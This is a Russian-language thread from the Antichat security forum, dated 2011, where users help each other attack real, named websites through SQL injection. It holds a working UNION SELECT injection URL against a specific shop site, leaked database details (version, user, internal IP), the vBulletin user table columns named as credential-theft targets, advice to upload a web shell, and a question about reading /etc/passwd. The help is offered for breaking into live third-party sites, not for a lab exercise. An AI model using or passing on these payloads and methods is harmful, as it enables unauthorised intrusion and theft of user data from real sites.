ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

09.03.2011, 21:32
|
|
Постоянный
Регистрация: 28.09.2008
Сообщений: 456
Провел на форуме: 2244151
Репутация:
404
|
|
Не думал, что когда-то буду сюда писать...но))
_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)
|
|
|

09.03.2011, 21:48
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от Kernet
Kernet said:
Не думал, что когда-то буду сюда писать...но))
_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)
ВНЕЗАПНО!111
http://www.nordiz.ru/news.php?newsid=119+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15--+
|
|
|

09.03.2011, 21:50
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от Kernet
Kernet said:
Не думал, что когда-то буду сюда писать...но))
_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)
да ,
database version: 5.1.41-log
database user: hand_mysql@10.1.104.162
database name: hand_nordis
|
|
|

09.03.2011, 22:33
|
|
Постоянный
Регистрация: 28.09.2008
Сообщений: 456
Провел на форуме: 2244151
Репутация:
404
|
|
мда, скульмап по 1 символу в 1.5 минуты тащит, олоооо
|
|
|

10.03.2011, 09:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 191387
Репутация:
6
|
|
какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно
|
|
|
|

10.03.2011, 09:37
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от noviyuser
noviyuser said:
какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно
Вот, полезный списочек http://itdefence.ru/dbitems/
Код:
Code:
Table: user
Columns:
userid
usergroupid
username
password
email
|
|
|

10.03.2011, 12:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 191387
Репутация:
6
|
|
как можно определить жумлу к какому сайта относится кроме таблиц jos_session и jos_content и файла configuration.php (на самом деле только доступ к таблицам)?
|
|
|
|

10.03.2011, 12:29
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме: 44954
Репутация:
0
|
|
Помогите, плз
Имею пхп-инъек..
Вытащил config.php - получил данные к mysql, но host:localhost
Вопрос: как можно узнать mysql.server???
спасибо
|
|
|

10.03.2011, 12:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 11371
Репутация:
0
|
|
Сообщение от stasiliy
stasiliy said:
Помогите, плз
Имею
пхп-инъек
..
Вытащил
config.php
- получил данные к mysql, но
host:localhost
Вопрос: как можно узнать
mysql.server
???
спасибо
попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..
|
|
|
|

10.03.2011, 12:34
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме: 44954
Репутация:
0
|
|
Сообщение от baobabeng
baobabeng said:
попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..
пробовал, не выходит
А в /etc/passwd можно откопать имя пользователя???
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|